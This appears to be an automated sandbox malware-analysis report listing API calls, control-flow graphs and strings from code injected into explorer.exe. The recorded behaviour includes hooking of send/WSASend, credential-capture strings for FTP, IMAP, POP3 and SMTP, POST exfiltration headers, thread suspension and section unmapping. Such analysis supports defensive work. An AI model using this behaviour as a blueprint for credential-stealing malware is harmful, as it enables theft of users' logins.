                                                                                                                                                        • Part of subcall function 0086263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00862672
                                                                                                                                                        • Part of subcall function 0086263E: lstrlen.KERNEL32(?,00000000), ref: 0086267A
                                                                                                                                                        • Part of subcall function 0086263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00862685
                                                                                                                                                        • Part of subcall function 0086263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0086269F
                                                                                                                                                        • Part of subcall function 0086263E: wsprintfA.USER32 ref: 008626B6
                                                                                                                                                        • Part of subcall function 0086263E: CryptDestroyHash.ADVAPI32(?), ref: 008626CF
                                                                                                                                                        • Part of subcall function 0086263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 008626D9
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00861389
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0086138F
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 008613A1
                                                                                                                                                        • Part of subcall function 008624D5: GetCurrentProcessId.KERNEL32 ref: 008624E7
                                                                                                                                                        • Part of subcall function 008624D5: GetCurrentThreadId.KERNEL32 ref: 008624EF
                                                                                                                                                        • Part of subcall function 008624D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008624FF
                                                                                                                                                        • Part of subcall function 008624D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0086250D
                                                                                                                                                        • Part of subcall function 008624D5: CloseHandle.KERNEL32(00000000), ref: 00862566
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 008613B8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 008613BF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 008613E4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 008613EB
                                                                                                                                                        • Part of subcall function 00861DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00861E1D
                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0086141D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                                      • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                                      • API String ID: 706757162-1430290102
                                                                                                                                                      • Opcode ID: 79f9d1d4366de0cca2e50f1145975fb9bbdfd7ea6ead8ec5dc42e576cf9bb2f0
                                                                                                                                                      • Instruction ID: d897a564760335fcb78028225e20c8813e1ce4ec007f9a281e3c75d5255225fa
                                                                                                                                                      • Opcode Fuzzy Hash: 79f9d1d4366de0cca2e50f1145975fb9bbdfd7ea6ead8ec5dc42e576cf9bb2f0
                                                                                                                                                      • Instruction Fuzzy Hash: 15316F30740A14BBCF006FA4DD1AB9E3A66FB15B42F065064F606D72A2CFB58A158796
                                                                                                                                                      Function 00861647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 236 861647-86165a 237 861660-861662 236->237 238 861748-86174f 236->238 237->238 239 861668-86166b 237->239 239->238 240 861671-86167d lstrlen 239->240 241 861747 240->241 242 861683-86168a lstrlen 240->242 241->238 242->241 243 861690-8616a8 getpeername 242->243 243->241 244 8616ae-8616ca inet_ntoa htons 243->244 244->241 245 8616cc-8616d4 244->245 246 8616d6-8616d9 245->246 247 861708 245->247 249 8616f3-8616f8 246->249 250 8616db-8616de 246->250 248 86170d-86173c call 862861 wsprintfA call 8624ae 247->248 248->241 260 86173e-861745 call 862843 248->260 249->248 252 8616e0-8616e3 250->252 253 861701-861706 250->253 255 8616e5-8616ea 252->255 256 8616fa-8616ff 252->256 253->248 255->249 258 8616ec-8616f1 255->258 256->248 258->241 258->249 260->241
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                                      • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                                      • API String ID: 3379139566-1703351401
                                                                                                                                                      • Opcode ID: 1d31c629f3277bf56f48770944b905151ea2b2e5972cfe8ec06edffd12d2132e
                                                                                                                                                      • Instruction ID: a957ef198e6d4014e44cb11ea6fdc534364acb362a7ea1c34c6a9e1b36a4f7fa
                                                                                                                                                      • Opcode Fuzzy Hash: 1d31c629f3277bf56f48770944b905151ea2b2e5972cfe8ec06edffd12d2132e
                                                                                                                                                      • Instruction Fuzzy Hash: 6B21B576E002096B9F115EED8C8C5BE7AA9FB45702F0F4075E904D321ADA70CE049B91
                                                                                                                                                      Function 00861752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 268 861752-861774 GetModuleHandleA GetProcAddress 269 861776-8617c0 RtlZeroMemory * 4 268->269 270 8617c1-8617c6 268->270 269->270
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00861539,?,?,?,0086144B,?), ref: 00861763
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0086176A
                                                                                                                                                      • RtlZeroMemory.NTDLL(00864228,00000104), ref: 00861788
                                                                                                                                                      • RtlZeroMemory.NTDLL(00864118,00000104), ref: 00861790
                                                                                                                                                      • RtlZeroMemory.NTDLL(00864330,00000104), ref: 00861798
                                                                                                                                                      • RtlZeroMemory.NTDLL(00864000,00000104), ref: 008617A1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                                      • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                                      • API String ID: 1490332519-278825019
                                                                                                                                                      • Opcode ID: b37293e2cf831594576d9c4556461e74b9637e440a77baf1d06baf7c392cf90d
                                                                                                                                                      • Instruction ID: f5f9444018879bbc3cdc8a3a843908f86c42f3769dbcd0f9fdc320c2a11b7241
                                                                                                                                                      • Opcode Fuzzy Hash: b37293e2cf831594576d9c4556461e74b9637e440a77baf1d06baf7c392cf90d
                                                                                                                                                      • Instruction Fuzzy Hash: E3F08222B8072C37852022AA6C1AD4FBE5CFA52FA63132155F624E3382C8AE690446F5
                                                                                                                                                      Function 008624D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 008624E7
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 008624EF
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008624FF
                                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 0086250D
                                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0086252C
                                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 0086253C
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0086254B
                                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0086255B
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00862566
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                                      • Opcode ID: ef4fa933c3b6e025d5b4df09adfcbeb749069ae00e7b5c6750c028b9620400e4
                                                                                                                                                      • Instruction ID: c94a0483dc74cd33ef4391150d0a8845ca96e8256f5699667c48b0ad4b2f2768
                                                                                                                                                      • Opcode Fuzzy Hash: ef4fa933c3b6e025d5b4df09adfcbeb749069ae00e7b5c6750c028b9620400e4
                                                                                                                                                      • Instruction Fuzzy Hash: C3115B71408B05EFD7119F60AC4CB6EBBB8FF99715F061569FA42D2150D7B08A0D8BA3
                                                                                                                                                      Function 00861F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 282 861f4a-861fa5 call 8622b8 call 862861 call 8627e2 call 862374 291 861fa7-861fbe 282->291 292 861fc0-861fcc 282->292 295 861fd0-861fd2 291->295 292->295 296 8622a6-8622b5 call 862843 295->296 297 861fd8-86200f RtlZeroMemory 295->297 301 862015-862030 297->301 302 86229e-8622a5 297->302 303 862062-862074 301->303 304 862032-862043 call 8622e5 301->304 302->296 311 862078-86207a 303->311 309 862056 304->309 310 862045-862054 304->310 312 862058-862060 309->312 310->312 313 862080-8620dc call 862731 311->313 314 86228b-862291 311->314 312->311 322 862284 313->322 323 8620e2-8620e7 313->323 316 862293-862295 call 862843 314->316 317 86229a 314->317 316->317 317->302 322->314 324 862101-86212f call 862861 wsprintfW 323->324 325 8620e9-8620fa 323->325 328 862131-862133 324->328 329 862148-86215f 324->329 325->324 330 862134-862137 328->330 335 862161-862197 call 862861 wsprintfW 329->335 336 86219e-8621b8 329->336 331 862142-862144 330->331 332 862139-86213e 330->332 331->329 332->330 334 862140 332->334 334->329 335->336 340 862261-862277 call 862843 336->340 341 8621be-8621d1 336->341 349 862280 340->349 350 862279-86227b call 862843 340->350 341->340 344 8621d7-8621ed call 862861 341->344 351 8621ef-8621fa 344->351 349->322 350->349 353 86220e-862225 351->353 354 8621fc-862209 call 862826 351->354 358 862227 353->358 359 862229-862236 353->359 354->353 358->359 359->351 360 862238-86223c 359->360 361 862256-86225d call 862843 360->361 362 86223e 360->362 361->340 363 86223e call 862815 362->363 365 862243-862250 RtlMoveMemory 363->365 365->361
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                        • Part of subcall function 008627E2: lstrlen.KERNEL32(008640DA,?,00000000,00000000,00861F86,771A8A60,008640DA,00000000), ref: 008627EA
                                                                                                                                                        • Part of subcall function 008627E2: MultiByteToWideChar.KERNEL32(00000000,00000000,008640DA,00000001,00000000,00000000), ref: 008627FC
                                                                                                                                                        • Part of subcall function 00862374: RtlZeroMemory.NTDLL(?,00000018), ref: 00862386
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 00861FE2
                                                                                                                                                      • wsprintfW.USER32 ref: 0086211B
                                                                                                                                                      • wsprintfW.USER32 ref: 00862186
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00862250
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                      • API String ID: 4204651544-1701262698
                                                                                                                                                      • Opcode ID: 9c3f9e45f757394c9be7d926749b793a67005ab033bdb4632d3202140cc2c424
                                                                                                                                                      • Instruction ID: 03a743ec9a5e759dd6c2ca9d16334c60dfebf5fad95d3f12bc3c9696deed9ad6
                                                                                                                                                      • Opcode Fuzzy Hash: 9c3f9e45f757394c9be7d926749b793a67005ab033bdb4632d3202140cc2c424
                                                                                                                                                      • Instruction Fuzzy Hash: 4FA17B71608B05AFD710DF68DC85A2BBBE8FB89340F12486DF985D3361DA74DE088B52
                                                                                                                                                      Function 008625AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 367 8625ad-8625c9 OpenProcess 368 862600-862607 367->368 369 8625cb-8625da IsWow64Process 367->369 370 8625f7 369->370 371 8625dc-8625ec IsWow64Process 369->371 373 8625f9-8625fa CloseHandle 370->373 372 8625ee-8625f5 371->372 371->373 372->373 373->368
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,771AE800,?,?,microsoftedgecp.exe,00861287), ref: 008625BF
                                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 008625D1
                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 008625E4
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 008625FA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                      • String ID: microsoftedgecp.exe
                                                                                                                                                      • API String ID: 331459951-1475183003
                                                                                                                                                      • Opcode ID: e496275f760bdb453693dde2af148ff2471601d2b5a8fd422dc9a76a8f39963d
                                                                                                                                                      • Instruction ID: 979cb695ee983568638bfe69778ef85c84dbc133ac2dcfe0dc272196686af819
                                                                                                                                                      • Opcode Fuzzy Hash: e496275f760bdb453693dde2af148ff2471601d2b5a8fd422dc9a76a8f39963d
                                                                                                                                                      • Instruction Fuzzy Hash: 2FF09071902A2CFF9B10CF909E888EE776CFB01265B1512AAF901D2140D7714F08EAA1
                                                                                                                                                      Function 00861B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 422 861b17-861b2c 423 861b60-861b68 422->423 424 861b2e 422->424 426 861bc3-861bcb 423->426 427 861b6a-861b6f 423->427 425 861b30-861b5e RtlMoveMemory 424->425 425->423 425->425 428 861bcd-861bdf 426->428 429 861c0b 426->429 430 861bbe-861bc1 427->430 428->429 432 861be1-861bfe LdrProcessRelocationBlock 428->432 433 861c0d-861c12 429->433 430->426 431 861b71-861b84 LoadLibraryA 430->431 435 861c15-861c17 431->435 436 861b8a-861b8f 431->436 432->429 434 861c00-861c04 432->434 434->429 437 861c06-861c09 434->437 435->433 438 861bb6-861bb9 436->438 437->429 437->432 439 861b91-861b95 438->439 440 861bbb 438->440 441 861b97-861b9a 439->441 442 861b9c-861b9f 439->442 440->430 443 861ba1-861bab GetProcAddress 441->443 442->443 443->435 444 861bad-861bb3 443->444 444->438
                                                                                                                                                      APIs
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00861B4E
                                                                                                                                                      • LoadLibraryA.KERNEL32(?,00864434,00000000,00000000,771B2EE0,00000000,00861910,?,?,?,00000001,?,00000000), ref: 00861B76
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00861BA3
                                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00861BF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                                      • Opcode ID: e25abe9e794951c35f4bae7eaa1b031183a134c6e30e07cb8c41b44693007f26
                                                                                                                                                      • Instruction ID: 48518124a8ad8feef54403d0bf4563c4d77921718028871a70366fcd03b15579
                                                                                                                                                      • Opcode Fuzzy Hash: e25abe9e794951c35f4bae7eaa1b031183a134c6e30e07cb8c41b44693007f26
                                                                                                                                                      • Instruction Fuzzy Hash: 2931A375700616ABCF24CF29C888B76B7E8FF05325F1A456CE846C7202E731E845CBA0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:8.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                      execution_graph 761 9e9fab 762 9e9fd8 761->762 763 9ea1f3 761->763 766 9ea048 762->766 770 9ea04d 766->770 767 9ea135 LoadLibraryA 767->770 768 9ea190 VirtualProtect VirtualProtect 769 9ea1e8 768->769 769->769 770->767 770->768 771 9e9ff8 770->771

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_009E141D 1 Function_009E2E98 7 Function_009E2E08 1->7 12 Function_009E1A04 1->12 16 Function_009E2CB8 1->16 33 Function_009E1DD4 1->33 46 Function_009E2BF4 1->46 49 Function_009E2B70 1->49 2 Function_009E2418 18 Function_009E1838 2->18 34 Function_009E2054 2->34 54 Function_009E1860 2->54 3 Function_009E2010 3->12 4 Function_009E188C 4->18 5 Function_009EA00A 6 Function_009E3088 6->1 47 Function_009E1B70 6->47 7->2 35 Function_009E1D50 7->35 52 Function_009E18E8 7->52 7->54 8 Function_009E2508 36 Function_009E18D0 8->36 38 Function_009E25C4 8->38 53 Function_009E24E0 8->53 9 Function_009E1C08 10 Function_009E1A88 11 Function_009E1508 13 Function_009E1405 14 Function_009E2E80 15 Function_009E1000 16->18 27 Function_009E1D20 16->27 16->54 17 Function_009E1938 19 Function_009E14B2 20 Function_009E1BB0 21 Function_009E9FAB 37 Function_009EA048 21->37 22 Function_009E1C28 23 Function_009E45A7 24 Function_009E1822 25 Function_009E3220 25->9 25->17 25->18 25->20 25->22 25->47 56 Function_009E2860 25->56 26 Function_009E2620 28 Function_009E3020 28->1 28->47 29 Function_009E355C 29->18 29->25 29->29 29->47 50 Function_009E30F0 29->50 30 Function_009E1C58 31 Function_009E1254 32 Function_009E14D4 33->18 34->3 34->4 34->17 34->18 34->36 39 Function_009E1F40 34->39 42 Function_009E18F8 34->42 48 Function_009E1E70 34->48 34->54 35->18 37->5 41 Function_009E25FC 38->41 39->18 39->42 40 Function_009E4A41 43 Function_009E14F9 44 Function_009E1576 45 Function_009E2774 49->12 49->18 50->8 50->10 50->18 50->30 50->54 51 Function_009E156C 54->47 55 Function_009E1560 56->26 56->45 56->47

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 009E355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 119 9e355c-9e356c call 9e1b70 122 9e35fc-9e3601 119->122 123 9e3572-9e35a5 call 9e1838 119->123 127 9e35a7 call 9e1838 123->127 128 9e35d1-9e35f6 NtUnmapViewOfSection 123->128 131 9e35ac-9e35c5 127->131 132 9e3608-9e3617 call 9e3220 128->132 133 9e35f8-9e35fa 128->133 131->128 139 9e3619-9e361c call 9e355c 132->139 140 9e3621-9e362a 132->140 133->122 134 9e3602-9e3607 call 9e30f0 133->134 134->132 139->140
                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009E35D8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_9e1000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                      • Instruction ID: 161058fbc1f8794c28319659e96f620fa80268443f6ca9dc08941d8a1374d923
                                                                                                                                                      • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                      • Instruction Fuzzy Hash: 8A11C430611A495FEB59BBBAD89E37937A4FB54302F54412AA419C76A1DE398E40C701
                                                                                                                                                      Function 009E3220 Relevance: 7.7, APIs: 5, Instructions: 241processCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 9e3220-9e325b call 9e1838 3 9e3261-9e3273 CreateToolhelp32Snapshot 0->3 4 9e3549-9e3554 SleepEx 3->4 5 9e3279-9e328f Process32First 3->5 4->3 6 9e3538-9e353a 5->6 7 9e3294-9e32ac 6->7 8 9e3540-9e3543 CloseHandle 6->8 10 9e348c-9e3495 call 9e1bb0 7->10 11 9e32b2-9e32c6 7->11 8->4 15 9e352a-9e3532 Process32Next 10->15 16 9e349b-9e34a4 call 9e1c08 10->16 11->10 17 9e32cc-9e32e0 11->17 15->6 16->15 21 9e34aa-9e34b1 call 9e1c28 16->21 17->10 22 9e32e6-9e32fa 17->22 21->15 26 9e34b3-9e34c1 call 9e1b70 21->26 22->10 27 9e3300-9e3314 22->27 26->15 32 9e34c3-9e3525 call 9e1938 call 9e2860 call 9e1938 26->32 27->10 31 9e331a-9e332e 27->31 31->10 35 9e3334-9e3348 31->35 32->15 35->10 40 9e334e-9e3362 35->40 40->10 44 9e3368-9e337c 40->44 44->10 46 9e3382-9e3396 44->46 46->10 48 9e339c-9e33b0 46->48 48->10 50 9e33b6-9e33ca 48->50 50->10 52 9e33d0-9e33e4 50->52 52->10 54 9e33ea-9e33fe 52->54 54->10 56 9e3404-9e3418 54->56 56->10 58 9e341a-9e342e 56->58 58->10 60 9e3430-9e3444 58->60 60->10 62 9e3446-9e345a 60->62 62->10 64 9e345c-9e3470 62->64 64->10 66 9e3472-9e3486 64->66 66->10 66->15
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_9e1000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2482764027-0
                                                                                                                                                      • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                      • Instruction ID: a15d268467de19eed6c2fb27eee3e17e836bfe60647c8800b8495b4bc1a6b47f
                                                                                                                                                      • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                      • Instruction Fuzzy Hash: FB8121312186488FE716DF15E858FEAB7A5FB94740F04861AA046C31B0EF78DE04CB81
                                                                                                                                                      Function 009EA048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 68 9ea048-9ea04b 69 9ea055-9ea059 68->69 70 9ea05b-9ea063 69->70 71 9ea065 69->71 70->71 72 9ea04d-9ea053 71->72 73 9ea067 71->73 72->69 74 9ea06a-9ea071 73->74 76 9ea07d 74->76 77 9ea073-9ea07b 74->77 76->74 78 9ea07f-9ea082 76->78 77->76 79 9ea097-9ea0a4 78->79 80 9ea084-9ea092 78->80 92 9ea0be-9ea0cc call 9ea00a 79->92 93 9ea0a6-9ea0a8 79->93 81 9ea0ce-9ea0e9 80->81 82 9ea094-9ea095 80->82 83 9ea11a-9ea11d 81->83 82->79 85 9ea11f-9ea120 83->85 86 9ea122-9ea129 83->86 89 9ea101-9ea105 85->89 87 9ea12f-9ea133 86->87 90 9ea135-9ea14e LoadLibraryA 87->90 91 9ea190-9ea1e4 VirtualProtect * 2 87->91 94 9ea0eb-9ea0ee 89->94 95 9ea107-9ea10a 89->95 97 9ea14f-9ea156 90->97 101 9ea1e8-9ea1ed 91->101 92->69 99 9ea0ab-9ea0b2 93->99 94->86 98 9ea0f0 94->98 95->86 100 9ea10c-9ea110 95->100 97->87 103 9ea158 97->103 104 9ea0f1-9ea0f5 98->104 114 9ea0bc 99->114 115 9ea0b4-9ea0ba 99->115 100->104 105 9ea112-9ea119 100->105 101->101 106 9ea1ef-9ea1fe 101->106 107 9ea15a-9ea162 103->107 108 9ea164-9ea16c 103->108 104->89 109 9ea0f7-9ea0f9 104->109 105->83 112 9ea16e-9ea17a 107->112 108->112 109->89 113 9ea0fb-9ea0ff 109->113 117 9ea17c-9ea183 112->117 118 9ea185-9ea18f 112->118 113->89 113->95 114->92 114->99 115->114 117->97
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE ref: 009EA147
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 009EA1BB
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009EA1D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.2523151456.00000000009E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E7000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_9e7000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                      • Instruction ID: 1284d51a08816201a3f413dbcbbdc6a923261b828f71bc1deff1cf11c9a2d005
                                                                                                                                                      • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                      • Instruction Fuzzy Hash: B2519E3135C99E4BCB26AA3D9CC46F5B7C5E75A326F14072AD08AC32A4D559FC468383

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:15.1%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.6%
                                                                                                                                                      Signature Coverage:18.6%
                                                                                                                                                      Total number of Nodes:328
                                                                                                                                                      Total number of Limit Nodes:7
